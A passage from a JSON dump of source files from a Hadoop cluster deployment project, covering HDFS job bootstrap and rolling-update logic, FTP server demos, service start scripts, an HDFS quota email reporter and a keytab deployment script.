job_name, host, instance_id):\n if job_name != \"datanode\":\n return \"0\"\n else:\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"hdfs\", args.hdfs_config.cluster.name, job_name, instance_id=instance_id)\n data_dirs = supervisor_client.get_available_data_dirs()\n return \",\".join([str(i) for i in range(len(data_dirs))])\n\ndef install(args):\n get_hdfs_service_config(args)\n deploy_utils.install_service(args, \"hdfs\", args.hdfs_config, \"hadoop\")\n\ndef cleanup_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n cleanup_script = str()\n if job_name == \"zkfc\":\n cleanup_script = generate_cleanup_script(args, host, job_name, host_id, instance_id, active)\n deploy_utils.cleanup_job(\"hdfs\", args.hdfs_config,\n host, job_name, instance_id, cleanup_token, cleanup_script)\n\ndef cleanup(args):\n get_hdfs_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"hdfs\", args.hdfs_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hdfs_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'cleanup', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(cleanup_job, task_list)\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n if job_name == \"namenode\" and not active:\n hosts = args.hdfs_config.jobs[job_name].hosts\n while not deploy_utils.check_service(hosts[0].ip,\n args.hdfs_config.jobs[\"namenode\"].base_port):\n Log.print_warning(\"Wait for active namenode starting\")\n time.sleep(2)\n\n # parse the service_config according to the instance_id\n args.hdfs_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n data_dir_indexes = get_data_dir_indexes(args, job_name, host, instance_id)\n config_files = generate_configs(args, host, job_name, instance_id)\n if job_name == \"namenode\" or job_name == \"zkfc\":\n bootstrap_script = generate_bootstrap_script(args, host, job_name, host_id, instance_id, active)\n deploy_utils.bootstrap_job(args, \"hadoop\", \"hdfs\", args.hdfs_config,\n host, job_name, instance_id, cleanup_token, data_dir_indexes, bootstrap_script,\n **config_files)\n else:\n deploy_utils.bootstrap_job(args, \"hadoop\", \"hdfs\", args.hdfs_config,\n host, job_name, instance_id, cleanup_token, data_dir_indexes, '', **config_files)\n # start job after bootstrapping\n args.skip_gen_config_files = True\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n get_hdfs_service_config(args)\n\n cleanup_token = deploy_utils.confirm_bootstrap(\"hdfs\", args.hdfs_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hdfs_config.jobs[job_name].hosts\n if job_name == \"namenode\":\n while not check_journalnode_all_started(args):\n Log.print_warning(\"Wait for journalnode starting\")\n time.sleep(2)\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'bootstrap', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(bootstrap_job, task_list)\n\ndef start_job(args, host, job_name, host_id, instance_id, is_wait=False):\n if is_wait:\n deploy_utils.wait_for_job_stopping(\"hdfs\",\n args.hdfs_config.cluster.name, job_name, host, instance_id)\n\n # parse the service_config according to the instance_id\n args.hdfs_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = deploy_utils.get_http_service_uri(host,\n args.hdfs_config.jobs[job_name].base_port, instance_id)\n config_files = dict()\n if not args.skip_gen_config_files:\n config_files = generate_configs(args, host, job_name, instance_id)\n deploy_utils.start_job(args, \"hadoop\", \"hdfs\", args.hdfs_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n get_hdfs_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hdfs_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'start')\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"hdfs\", args.hdfs_config,\n host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n get_hdfs_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hdfs_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n get_hdfs_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hdfs_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hdfs_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'start', is_wait=True)\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef show_job(args, host, job_name, instance_id):\n deploy_utils.show_job(\"hdfs\", args.hdfs_config, host, job_name, instance_id)\n\ndef show(args):\n get_hdfs_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hdfs_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'show')\n parallel_deploy.start_deploy_threads(show_job, task_list)\n\ndef run_shell(args):\n get_hdfs_service_config(args)\n\n main_class, options = deploy_utils.parse_shell_command(\n args, SHELL_COMMAND_INFO)\n if not main_class:\n return\n # parse the service_config, suppose the instance_id is -1\n args.hdfs_config.parse_generated_config_files(args)\n core_site_dict = args.hdfs_config.configuration.generated_files[\"core-site.xml\"]\n hdfs_site_dict = args.hdfs_config.configuration.generated_files[\"hdfs-site.xml\"]\n\n hadoop_opts = list()\n for key, value in core_site_dict.iteritems():\n hadoop_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n for key, value in hdfs_site_dict.iteritems():\n hadoop_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n\n package_root = deploy_utils.get_artifact_package_root(args,\n args.hdfs_config.cluster, \"hadoop\")\n lib_root = \"%s/share/hadoop\" % package_root\n class_path = \"%s/etc/hadoop\" % package_root\n for component in [\"common\", \"hdfs\"]:\n component_dir = \"%s/%s\" % (lib_root, component)\n class_path += \":%s/:%s/*:%s/lib/*\" % (component_dir,\n component_dir, component_dir)\n\n if deploy_utils.is_security_enabled(args):\n boot_class_path = \"%s/common/lib/hadoop-security-%s.jar\" % (lib_root,\n args.hdfs_config.cluster.version)\n hadoop_opts.append(\"-Xbootclasspath/p:%s\" % boot_class_path)\n hadoop_opts.append(\"-Dkerberos.instance=hadoop\")\n hadoop_opts.append(\n \"-Djava.security.krb5.conf=%s/krb5-hadoop.conf\" %\n deploy_utils.get_config_dir())\n\n cmd = ([\"java\", \"-cp\", class_path] + hadoop_opts +\n [main_class] + options)\n p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)\n p.wait()\n\ndef generate_client_config(args, artifact, version):\n config_path = \"%s/%s/%s-%s/etc/hadoop\" % (args.package_root,\n args.cluster, artifact, version)\n deploy_utils.write_file(\"%s/core-site.xml\" % config_path,\n deploy_utils.generate_site_xml(args,\n args.hdfs_config.configuration.generated_files[\"core-site.xml\"]))\n deploy_utils.write_file(\"%s/hdfs-site.xml\" % config_path,\n deploy_utils.generate_site_xml(args,\n args.hdfs_config.configuration.generated_files[\"hdfs-site.xml\"]))\n deploy_utils.write_file(\"%s/hadoop-metrics2.properties\" % config_path,\n generate_metrics_config(args, args.hdfs_config.jobs[\"namenode\"].hosts[0].ip,\n \"namenode\"))\n deploy_utils.write_file(\"%s/krb5.conf\" % config_path,\n args.hdfs_config.configuration.raw_files[\"krb5.conf\"])\n update_hadoop_env_sh(args, artifact, version, \"HADOOP_OPTS\")\n\ndef update_hadoop_env_sh(args, artifact, version, opts_name):\n config_path = \"%s/%s/%s-%s/etc/hadoop\" % (args.package_root,\n args.cluster, artifact, version)\n hadoop_opts = \"-Djava.security.krb5.conf=$HADOOP_CONF_DIR/krb5.conf\"\n deploy_utils.append_to_file(\"%s/hadoop-env.sh\" % config_path,\n 'export %s=\"$%s %s\"\\n' % (opts_name, opts_name, hadoop_opts))\n\ndef pack(args):\n get_hdfs_service_config(args)\n args.hdfs_config.parse_generated_config_files(args)\n\n version = args.hdfs_config.cluster.version\n deploy_utils.make_package_dir(args, \"hadoop\", args.hdfs_config.cluster)\n generate_client_config(args, \"hadoop\", version)\n\n if not args.skip_tarball:\n deploy_utils.pack_package(args, \"hadoop\", args.hdfs_config.cluster.version)\n Log.print_success(\"Pack client utilities for hadoop success!\\n\")\n\ndef rolling_update(args):\n if not args.job:\n Log.print_critical(\"You must specify the job name to do rolling update\")\n\n get_hdfs_service_config(args)\n job_name = args.job[0]\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.hdfs_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"hdfs\",\n args.hdfs_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"hdfs\",\n args.hdfs_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n wait_time = args.time_interval\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.6258924603462219,
"alphanum_fraction": 0.6473107933998108,
"avg_line_length": 40.19607925415039,
"blob_id": "68f591ecc7da3065f51379a77df79f2cdeb21159",
"content_id": "8c9ad7deb49c7d07f94bd46596621e29a5a7b004",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2101,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 51,
"path": "/supervisor/supervisor/medusa/demo/winFTPserver.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#\n# winFTPServer.py -- FTP server that uses Win32 user API\n#\n# Contributed by John Abel\n#\n# For it to authenticate users correctly, the user running the\n# script must be added to the security policy \"Act As Part Of The OS\".\n# This is needed for the LogonUser to work. A pain, but something that MS\n# forgot to mention in the API.\n\n\nimport win32security, win32con, win32api, win32net\nimport ntsecuritycon, pywintypes\nfrom supervisor.medusa import asyncore_25 as asyncore\nfrom supervisor.medusa import ftp_server, filesys\n\nclass Win32Authorizer:\n\n\n def authorize (self, channel, userName, passWord):\n self.AdjustPrivilege( ntsecuritycon.SE_CHANGE_NOTIFY_NAME )\n self.AdjustPrivilege( ntsecuritycon.SE_ASSIGNPRIMARYTOKEN_NAME )\n self.AdjustPrivilege( ntsecuritycon.SE_TCB_NAME )\n try:\n logonHandle = win32security.LogonUser( userName,\n None,\n passWord,\n win32con.LOGON32_LOGON_INTERACTIVE,\n win32con.LOGON32_PROVIDER_DEFAULT )\n except pywintypes.error, ErrorMsg:\n return 0, ErrorMsg[ 2 ], None\n\n userInfo = win32net.NetUserGetInfo( None, userName, 1 )\n\n return 1, 'Login successful', filesys.os_filesystem( userInfo[ 'home_dir' ] )\n\n def AdjustPrivilege( self, priv ):\n flags = ntsecuritycon.TOKEN_ADJUST_PRIVILEGES | ntsecuritycon.TOKEN_QUERY\n htoken = win32security.OpenProcessToken(win32api.GetCurrentProcess(), flags)\n id = win32security.LookupPrivilegeValue(None, priv)\n newPrivileges = [(id, ntsecuritycon.SE_PRIVILEGE_ENABLED)]\n win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges)\n\ndef start_Server():\n# ftpServ = ftp_server.ftp_server( ftp_server.anon_authorizer( \"D:\\MyDocuments\\MyDownloads\"), port=21 )\n ftpServ = ftp_server.ftp_server( Win32Authorizer(), port=21 )\n asyncore.loop()\n\nif __name__ == \"__main__\":\n print \"Starting FTP Server\"\n start_Server()\n"
},
{
"alpha_fraction": 0.6229507923126221,
"alphanum_fraction": 0.6557376980781555,
"avg_line_length": 17.769229888916016,
"blob_id": "feb691564fe84cb782a56a166851dca88f882734",
"content_id": "335d993cf012472e5c170117ed9f29ae689c9c6f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 244,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 13,
"path": "/owl/start_owl_monitor.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 1 ]; then\n echo \"Usage: $0 port\"\n exit 1\nfi\n\nsource $SCRIPT_UTILS\nnohup ./runserver.sh 0.0.0.0:$1 &\n\nchild_pid=`get_child_pid $!`\ngrandchild_pid=`get_child_pid $child_pid`\necho $grandchild_pid > $OWL_MONITOR_PID_FILE\n"
},
{
"alpha_fraction": 0.4970845580101013,
"alphanum_fraction": 0.5189504623413086,
"avg_line_length": 28.826086044311523,
"blob_id": "3443716c9830a83e5d505f7b76745a9a852d76f6",
"content_id": "3c29aa039d54897fb57725f30deaab6ee54953a9",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1372,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 46,
"path": "/supervisor/supervisor/medusa/redirecting_handler.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n#\n# Author: Sam Rushing <[email protected]>\n# Copyright 1996-2000 by Sam Rushing\n# All Rights Reserved.\n#\n\nRCS_ID = '$Id: redirecting_handler.py,v 1.4 2002/03/20 17:37:48 amk Exp $'\n\nimport re\nimport counter\n\nclass redirecting_handler:\n\n def __init__ (self, pattern, redirect, regex_flag=re.IGNORECASE):\n self.pattern = pattern\n self.redirect = redirect\n self.patreg = re.compile (pattern, regex_flag)\n self.hits = counter.counter()\n\n def match (self, request):\n m = self.patreg.match (request.uri)\n return (m and (m.end() == len(request.uri)))\n\n def handle_request (self, request):\n self.hits.increment()\n m = self.patreg.match (request.uri)\n part = m.group(1)\n\n request['Location'] = self.redirect % part\n request.error (302) # moved temporarily\n\n def __repr__ (self):\n return '<Redirecting Handler at %08x [%s => %s]>' % (\n id(self),\n repr(self.pattern),\n repr(self.redirect)\n )\n\n def status (self):\n import producers\n return producers.simple_producer (\n '<li> Redirecting Handler %s => %s <b>Hits</b>: %s' % (\n self.pattern, self.redirect, self.hits\n )\n )\n"
},
{
"alpha_fraction": 0.6033918857574463,
"alphanum_fraction": 0.6077528595924377,
"avg_line_length": 34.42918395996094,
"blob_id": "92aaef0ad719d8d5ad0ce2537d42cf355a580c5a",
"content_id": "90a2e9d4bb4da3c88a98f2a90d319822ec6adaa6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8255,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 233,
"path": "/owl/quota/management/commands/quota_reportor.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import collections\nimport datetime\nimport logging\nimport smtplib\nimport sys\nimport time\n\nfrom optparse import make_option\nfrom os import path\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.utils import timezone\n\nimport owl_config\nimport monitor.dbutil\nimport utils.mail\nimport utils.quota_util\nimport deploy_utils\nfrom monitor.models import Cluster, Quota, Service\n\nlogger = logging.getLogger('quota')\n\n# cluster to generate report\nQUOTA_REPORT_CLUSTER = owl_config.QUOTA_REPORT_CLUSTER\n# user that receive cluster report\nQUOTA_REPORT_ADMINS = owl_config.QUOTA_REPORT_ADMINS\n# user that receive cluster quota alert\nQUOTA_ALERT_ADMINS = owl_config.QUOTA_ALERT_ADMINS\n\nKERBEROS_IDS_PATH = owl_config.KERBEROS_IDS_PATH\n\nadmin_email = ''\ntry:\n admin_email = settings.ADMINS[0][1]\nexcept:\n pass\n\nclass QuotaReportor:\n \"\"\"Update path quota in hdfs\"\"\"\n def __init__(self, options):\n self.options = options\n self.mailer = utils.mail.Mailer(options)\n self.user_report = {} # report group by user\n self.cluster_report = {} # report group by cluster\n self.today = datetime.date.today()\n self.kerb_user_map = self.init_kerb_user_map()\n\n def report(self):\n logger.info('start make quota report')\n self.start_time = time.time()\n try:\n for cluster_name in QUOTA_REPORT_CLUSTER:\n self.update_cluster(cluster_name)\n except Exception as e:\n logger.info('gather quota info failed: %r', e)\n self.mailer.send_email(subject = 'Make quota report failed',\n content = repr(e),\n to_email = admin_email,\n )\n else:\n self.send_report_mail()\n\n logger.info('spent %f seconds for make quota report',\n time.time() - self.start_time)\n\n def update_cluster(self, cluster_name):\n hdfs_service = Service.objects.get(name='hdfs')\n cluster = Cluster.objects.get(service=hdfs_service, name = cluster_name)\n quota_list = monitor.dbutil.get_quota_summary(cluster)\n for quota_record in quota_list:\n user_report = self.user_report.setdefault(quota_record.name, {})\n user_report[cluster_name] = quota_record\n cluster_report = self.cluster_report.setdefault(cluster_name, {})\n cluster_report[quota_record.name] = quota_record\n\n def send_report_mail(self):\n self.send_user_report_mail()\n self.send_cluster_report_mail()\n self.alert_to_not_healthy_users()\n\n def send_user_report_mail(self):\n for user, cluster_quota in self.user_report.iteritems():\n subject = 'Hadoop hdfs quota report for user %s' % user\n content = 'Report date: %s<br>' % self.today\n content += self.format_quota_report_content('cluster', cluster_quota)\n email_user = self.map_kerb_user_to_email_user(user)\n if email_user:\n email_addr = ','.join([addr for addr in email_user.split()])\n\n self.mailer.send_email(to_email = email_addr,\n subject = subject,\n content = content,\n type = 'html')\n else:\n logger.error('User %s has no email user' % user)\n\n def send_cluster_report_mail(self):\n subject = 'Hadoop hdfs quota report for admin'\n content = 'Report date: %s<br>' % self.today\n for cluster, user_quota in self.cluster_report.iteritems():\n content += 'Quota summary on cluster[%s]<br>' % cluster\n content += self.format_quota_report_content('user', user_quota)\n content += '********<br>'\n self.mailer.send_email(to_email = QUOTA_REPORT_ADMINS,\n subject = subject,\n content = content,\n type = 'html')\n\n def alert_to_not_healthy_users(self):\n subject = 'Hadoop hdfs quota alert'\n for user, cluster_quota in self.user_report.iteritems():\n for cluster, quota in cluster_quota.iteritems():\n need_alert = False\n content = 'Cluster: %s\\n' % cluster\n content += 'User: %s\\n' % user\n\n if not utils.quota_util.is_space_quota_healthy(\n quota.space_quota, quota.used_space_quota):\n content += 'Alert: space quota exceeded the threshold. \\\n Please cleanup trash or apply for more space quota.\\n'\n need_alert = True\n\n if not utils.quota_util.is_name_quota_healthy(\n quota.quota, quota.used_quota):\n content += 'Alert: name quota exceeded the threshold. \\\n Please cleanup trash or apply for more name quota.\\n'\n need_alert = True\n\n if need_alert:\n email_addrs = QUOTA_ALERT_ADMINS\n email_user = self.map_kerb_user_to_email_user(user)\n if email_user:\n email_addrs += ','.join([addr for addr in email_user.split()])\n self.mailer.send_email(to_email = email_addrs,\n subject = subject,\n content = content)\n\n @staticmethod\n def format_quota_report_content(key_name, quota_map):\n content = '<table>'\n HEADER_FORMAT_STR = '<tr><th>{}</th><th>{}</th><th>{}</th><th>{}</th><th>{}</th><th>{}</th><th>{}</th></tr>'\n content += HEADER_FORMAT_STR.format(key_name, 'SpaceQuota', 'UsedSpace', 'RemainingSpace', 'NameQuota', 'UsedName', 'RemainingName')\n\n ROW_FORMAT_STR = '<tr><td>{}</td><td>{}</td><td>{}</td><td %s>{}</td><td>{}</td><td>{}</td><td %s>{}</td></tr>'\n\n ordered_dict = collections.OrderedDict(sorted(quota_map.items()))\n for key, quota in ordered_dict.iteritems():\n space_quota_color = '' if utils.quota_util.is_space_quota_healthy(\n quota.space_quota, quota.used_space_quota) \\\n else 'style=\"color:rgb(255,0,0)\"'\n name_quota_color = '' if utils.quota_util.is_name_quota_healthy(\n quota.quota, quota.used_quota) \\\n else 'style=\"color:rgb(255,0,0)\"'\n format_str = ROW_FORMAT_STR % (space_quota_color, name_quota_color)\n content += format_str.format(key,\n format_bigint(quota.space_quota),\n format_bigint(quota.used_space_quota),\n format_bigint(quota.remaining_space_quota),\n quota.quota, quota.used_quota, quota.remaining_quota)\n content += '</table>'\n return content\n\n\n\n def init_kerb_user_map(self):\n res = {}\n config_path = deploy_utils.get_config_dir()\n with open(path.join(config_path, KERBEROS_IDS_PATH)) as f:\n for line in f:\n if line.startswith('#'):\n continue\n try:\n # file format: kerb_user user1[ user2 user3]\n kerb_user, email_users = line.strip().split(' ', 1)\n if kerb_user in res:\n logger.warn('Duplicated kerb user config for user: %s' % kerb_user)\n res[kerb_user] = email_users\n except Exception as e:\n logger.warn('Failed to parse user config [%r]: %s' % (e, line))\n return res\n\n\n def map_kerb_user_to_email_user(self, kerb_user):\n if kerb_user in self.kerb_user_map:\n return self.kerb_user_map[kerb_user]\n else:\n return None\n\nclass Command(BaseCommand):\n args = ''\n help = \"Run the background updater to collector quota on hdfs clusters.\"\n\n def handle(self, *args, **options):\n self.args = args\n self.options = options\n self.mailer = utils.mail.Mailer(options)\n\n self.stdout.write(\"args: %r\\n\" % (args, ))\n self.stdout.write(\"options: %r\\n\" % options)\n\n quota_reportor = QuotaReportor(options)\n\n try:\n quota_reportor.report()\n except Exception as e:\n logger.warning('Quota repotor aborted: %r', e)\n self.mailer.send_email(subject = 'Make quota report failed',\n content = repr(e),\n to_email = admin_email,\n )\n\ndef format_bigint(value):\n try:\n value = int(value)\n except (TypeError, ValueError):\n return value\n\n if value < 1024*1024:\n return value\n\n K = 1024\n formaters = (\n (2, '%.2fM'),\n (3, '%.2fG'),\n (4, '%.2fT'),\n (5, '%.2fP'),\n )\n\n for exponent, formater in formaters:\n larger_num = K ** exponent\n if value < larger_num * K:\n return formater % (value/float(larger_num))\n"
},
{
"alpha_fraction": 0.7684729099273682,
"alphanum_fraction": 0.7684729099273682,
"avg_line_length": 32.75,
"blob_id": "d6570dbb06666dfa5076d383b471cd2cab3e7225",
"content_id": "e889bbe9d9de6e4747d0727c1ce5a2eae7dd3636",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 406,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 12,
"path": "/supervisor/supervisor/medusa/TODO.txt",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "Things to do\n============\n\nBring remaining code up to current standards\nTranslate docs to RST\nWrite README, INSTALL, docs\nWhat should __init__ import? Anything? Every single class?\nUse syslog module in m_syslog for the constants?\nAdd abo's support for blocking producers\nGet all the producers into the producers module and write tests for them\n\nTest suites for protocols: how could that be implemented?\n\n"
},
{
"alpha_fraction": 0.5587301850318909,
"alphanum_fraction": 0.5873016119003296,
"avg_line_length": 14.699999809265137,
"blob_id": "8eab2e09164f63b9061e8012ca262493a9337b0b",
"content_id": "ec83ca7a512fa413ccecd21f7b711577ebb7c52b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 315,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 20,
"path": "/tank/start_tank.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nif [ $# -ne 2 ]; then\n echo \"usage: $0 ip port\"\n exit 1\nfi\n\ndb_file=\"sqlite/tank.db\"\n\nif ! [ -e $db_file ] || [ -z \"`cat $db_file`\" ]; then\n $ENV_PYTHON manage.py syncdb\nfi\n\nip=$1\nport=$2\n\nnohup $ENV_PYTHON manage.py runserver $ip:$port 1>tank.log 2>&1 &\n\nsleep 1\necho `pgrep -P $!` > $TANK_PID_FILE\n\n"
},
{
"alpha_fraction": 0.6994459629058838,
"alphanum_fraction": 0.7326869964599609,
"avg_line_length": 26.730770111083984,
"blob_id": "a92a8b7c08e282f120fa98d45285f82a1bdd1475",
"content_id": "5cc9a711bec4a74f434f5a53ffd99a26b3a0836f",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 722,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 26,
"path": "/supervisor/supervisor/medusa/demo/simple_anon_ftpd.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nfrom supervisor.medusa import asyncore_25 as asyncore\nfrom supervisor.medusa import ftp_server\n\n# create a 'dummy' authorizer (one that lets everyone in) that returns\n# a read-only filesystem rooted at '/home/ftp'\n\nauthorizer = ftp_server.dummy_authorizer('/home/ftp')\n\n# Create an ftp server using this authorizer, running on port 8021\n# [the standard port is 21, but you are probably already running\n# a server there]\n\nfs = ftp_server.ftp_server(authorizer, port=8021)\n\n# Run the async main loop\nasyncore.loop()\n\n# to test this server, try\n# $ ftp myhost 8021\n# when using the standard bsd ftp client,\n# $ ncftp -p 8021 myhost\n# when using ncftp, and\n# ftp://myhost:8021/\n# from a web browser.\n\n"
},
{
"alpha_fraction": 0.6378132104873657,
"alphanum_fraction": 0.6469248533248901,
"avg_line_length": 26.873016357421875,
"blob_id": "54e8ede9ac9945d10cad5556f7a524912647e00b",
"content_id": "785f9c11cd44109d140bc212eea13dd3518a513e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3512,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 126,
"path": "/client/deploy_keytab.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport csv\nimport os\nimport pexpect\nimport sys\n\nHADOOP_CONF_PATH = '/etc/hadoop/conf'\n\ndef parse_command_line():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Keytab deploy tool')\n\n parser.add_argument('cluster_type', type=str,\n choices=['srv', 'prc', 'tst'], help='The cluster type')\n\n parser.add_argument('--host_file', type=str, default='hosts',\n help='The host file list in csv format')\n\n parser.add_argument('--keytab_dir', type=str, default='keytab',\n help='The keytab file directory')\n\n parser.add_argument('--prod_user', type=str, default='work',\n help='The production enviroment user')\n\n parser.add_argument('--root_password', type=str,\n help='The root password of the production enviroment')\n\n args = parser.parse_args()\n return args\n\ndef check_args(args):\n if not os.path.exists(args.host_file):\n print 'Invalid host_file: %s' % args.host_file\n sys.exit(-4)\n\n if not os.path.exists(args.keytab_dir):\n print 'Invalid keytab_dir: %s' % args.keytab_dir\n sys.exit(-5)\n\ndef parse_host_file(host_file):\n file = open(host_file, 'r')\n csv_reader = csv.reader(file, delimiter=' ', skipinitialspace=True)\n\n host_list = list()\n for line in csv_reader:\n if line[0].lstrip().startswith('#'):\n continue\n host_list.append(line)\n file.close()\n return host_list\n\ndef scp(host, user, passwd, local_file, remote_file):\n child = pexpect.spawn('scp %s %s@%s:%s' % (local_file,\n user, host, remote_file))\n print child.args\n\n ret = child.expect(['yes/no.*', 'password.*', pexpect.EOF])\n if ret == 0:\n child.sendline('yes')\n child.expect('password.*', timeout=10)\n child.sendline(passwd)\n elif ret == 1:\n child.sendline(passwd)\n else:\n print 'Error occured when execute expect()'\n sys.exit(-2)\n\n return child.expect([pexpect.EOF, pexpect.TIMEOUT])\n\ndef remote_exec(host, user, passwd, cmd):\n child = pexpect.spawn('ssh %s@%s \"%s\"' % (user, host, cmd))\n print child.args\n\n ret = child.expect(['yes/no.*', 'password.*', pexpect.EOF], timeout=30)\n if ret == 0:\n child.sendline('yes')\n child.expect('password.*', timeout=10)\n child.sendline(passwd)\n elif ret == 1:\n child.sendline(passwd)\n else:\n print 'Error occured when execute expect()'\n sys.exit(-3)\n\n return child.expect([pexpect.EOF, pexpect.TIMEOUT])\n\ndef deploy(args, host):\n # mkdir -p HADOOP_CONF_PATH\n remote_exec(host, 'root', args.root_password,\n 'mkdir -p %s' % HADOOP_CONF_PATH)\n\n keytabs = [\n 'hdfs_%s.keytab' % args.cluster_type,\n 'hbase_%s.keytab' % args.cluster_type,\n 'yarn_%s.keytab' % args.cluster_type,\n 'zookeeper.keytab',\n 'impala.keytab',\n ]\n\n for keytab in keytabs:\n # scp keytab to HADOOP_CONF_PATH\n scp(host, 'root', args.root_password,\n '%s/%s' % (args.keytab_dir, keytab), HADOOP_CONF_PATH)\n\n # chown of keytab to prod_user:prod_user\n remote_exec(host, 'root', args.root_password,\n '\"chown %s:%s %s/%s\"' % (args.prod_user, args.prod_user,\n HADOOP_CONF_PATH, keytab))\n\n # chmod of keytab to 400\n remote_exec(host, 'root', args.root_password,\n '\"chmod 400 %s/%s\"' % (HADOOP_CONF_PATH, keytab))\n\n print '\\033[0;32mDeploy keytab on %s successfully\\033[0m' % host\n\ndef main():\n args = parse_command_line()\n check_args(args)\n\n host_list = parse_host_file(args.host_file)\n for host_info in host_list:\n deploy(args, host_info[0])\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7027971744537354,
